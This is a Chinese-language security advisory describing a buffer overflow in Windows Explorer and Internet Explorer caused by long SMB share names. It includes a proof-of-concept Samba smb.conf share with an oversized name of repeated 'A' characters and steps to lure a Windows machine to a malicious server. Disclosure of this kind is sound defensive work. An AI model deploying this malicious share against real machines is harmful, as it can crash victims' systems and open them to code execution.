微软资源管理器和IE浏览器长共享名缓冲区溢出漏洞
涉及程序:
微软资源管理器和IE浏览器
描述:
微软资源管理器和IE浏览器长共享名缓冲区溢出漏洞
详细:
微软资源管理器和IE浏览器时Windows操作系统的核心部分。Windows在访问一个远程文档服务器时处理长共享名存在缓冲区溢出漏洞!攻击者利用这个漏洞可以闯进客户端的资源管理器,最终可以获得作为当前用户(通常是Administrator)执行任意代码的权限!
受影响系统: MS Internet Explorer, MS Explorer (explorer.exe)=20
Windows XP(All), Windows 2000(All)
不受影响系统: Windows 2003,
Windows me,
Windows 98,
Windows 95
攻击方法:
攻击这首先要获得一台包含有合适长共享名的服务器的账号,在samba box 运行创建一个共享在smb.conf 后,
#------------ CUT HERE -------------
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment =3D Area 51
path =3D /tmp/testfolder
public =3D yes
writable =3D yes
printable =3D no
browseable =3D yes
write list =3D @trymywingchung
#------------ CUT HERE -------------
在你的服务器启动后,只需要让windows测试box并且点击
start menu > run > \\your.malicious.server.ip., plufff,
就可以进入资源管理器了。
解决方案:
请用户关注微软主页以获得相关信息
附加信息:
暂无有效攻击代码
推荐
评论(0条)
